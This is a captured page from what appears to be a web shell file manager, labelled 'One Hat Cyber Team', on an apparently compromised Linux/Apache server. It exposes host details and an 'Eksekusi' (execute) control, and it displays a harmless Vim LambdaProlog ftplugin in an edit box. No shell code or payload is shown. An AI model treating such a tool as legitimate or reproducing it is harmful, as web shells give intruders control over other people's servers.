⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.91
Server IP:
157.245.101.34
Server:
Linux skvinfotech-website 5.4.0-131-generic #147-Ubuntu SMP Fri Oct 14 17:07:22 UTC 2022 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
vim
/
vim81
/
ftplugin
/
Edit File: lprolog.vim
" Vim settings file " Language: LambdaProlog (Teyjus) " Maintainer: Markus Mottl
" URL: http://www.ocaml.info/vim/ftplugin/lprolog.vim " Last Change: 2006 Feb 05 " 2001 Sep 16 - fixed 'no_mail_maps'-bug (MM) " 2001 Sep 02 - initial release (MM) " Only do these settings when not done yet for this buffer if exists("b:did_ftplugin") finish endif " Don't do other file type settings for this buffer let b:did_ftplugin = 1 " Error format setlocal efm=%+A./%f:%l.%c:\ %m formatprg=fmt\ -w75\ -p\\% " Formatting of comments setlocal formatprg=fmt\ -w75\ -p\\% " Add mappings, unless the user didn't want this. if !exists("no_plugin_maps") && !exists("no_lprolog_maps") " Uncommenting if !hasmapto('
Comment') nmap
c
LUncomOn vmap
c
BUncomOn nmap
C
LUncomOff vmap
C
BUncomOff endif nnoremap
LUncomOn mz0i/*
$A */
`z nnoremap
LUncomOff
:s/^\/\* \(.*\) \*\//\1/
vnoremap
BUncomOn
:'<,'>
`
0i/*
`>o
0i*/
`< vnoremap
BUncomOff
:'<,'>
`
dd`< endif
Simpan